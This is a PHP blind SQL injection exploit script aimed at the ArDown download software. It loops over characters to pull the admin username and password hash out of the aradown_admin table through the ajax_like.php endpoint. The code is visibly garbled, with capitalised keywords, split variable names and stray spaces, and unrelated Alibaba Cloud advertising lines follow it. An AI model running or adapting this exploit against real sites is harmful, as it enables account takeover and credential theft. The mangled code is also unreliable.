<? Php
Title: ArDown (All Version) <-Remote Blind SQL Injection
Author: G-B www.2cto.com g22b@hotmail.com
Program: http://aradown.info/
# Version: All Version
[*] ----------------------------------------------------------------------- [*]
[*] Target-> ";
$ Target = stdin ();
$ Ar = array ('1', '2', '3', '4', '5', '6', '7', '8 ', '9', '0', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'h ', 'I', 'J', 'k', 'l', 'M', 'n', 'O', 'P', 'Q', 'R ', 'S ', 't', 'U', 'V', 'w', 'x', 'y', 'z ');
Echo "[*] Username :";
For ($ I = 1; $ I <= 30; $ I ++ ){
Foreach ($ ar as $ char ){
$ B = send ('HTTP: // www.2cto.com ', "3' and (select substr (username, $ I, 1) from aradown_admin) =' $ char '#");
If (eregi ('<span class = "on_img" align = "center"> </span>', $ B) & $ char = 'Z '){
$ I = 50;
Break;
}
If (eregi ('<span class = "on_img" align = "center"> </span>', $ B) continue;
Echo $ char;
Break;
}
}
Echo "\ n [*] Password :";
For ($ I = 1; $ I <= 32; $ I ++ ){
Foreach ($ ar as $ char ){
$ B = send ('HTTP: // Server', "3' and (select substr (password, $ I, 1) from aradown_admin) = '$ char '#");
If (eregi ('<span class = "on_img" align = "center"> </span>', $ B) continue;
Echo $ char;
Break;
}
}
Function send ($ target, $ query ){
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ target/ajax_like.php ");
Curl_setopt ($ ch, CURLOPT_POST, true );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('id' => $ query ));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
$ R = curl_exec ($ ch );
Curl_close ($ ch );
Return $ r;
}
Function stdin (){
$ Fp = fopen ("php: // stdin", "r ");
$ Line = trim (fgets ($ fp ));
Fclose ($ fp );
Return $ line;
}
?>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
